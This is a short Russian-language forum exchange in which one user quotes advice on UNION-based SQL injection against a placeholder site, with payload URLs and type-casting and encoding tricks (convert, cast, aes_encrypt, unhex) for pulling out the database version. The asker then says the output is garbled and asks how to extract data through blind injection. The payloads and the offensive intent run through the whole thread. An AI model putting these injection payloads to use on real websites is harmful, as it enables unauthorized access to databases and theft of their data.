Сообщение от
Redwood
Попробуй так
http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,null,null ,null,null,null
http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,version() ,null,null,null,null
Возможные варианты:
- не соответствует кодировка или тип данных.
Тогда, пользуйся функциями приведения типов
convert(version(),binary)
convert(version()+using+latin1)
convert(version()+using+binary)
cast(version()+as+binary)
cast(version()+as+int)
cast(version()+as+char)
и тд.
Ну или шифруй и расшифровывай данные на ходу, тогда они вернутся уже в нужной кодировке
aes_decrypt(aes_encrypt(version(),1),1)
unhex(hex(version()))
Многие базы, в отличии от MySQL, чувствительны к типу данных, например PostgreSQL.
- у скули нету вывода.
я пробовал по разному, если http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,null,null ,null,null,null
http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,version() ,null,null,null,null
то показывает абракадабру.
функции приведения типов не дали не чего...
что делать если у скули нет вывода?
blind sql inj вроде работает, определил версию...но вывести через нее ,как я не понял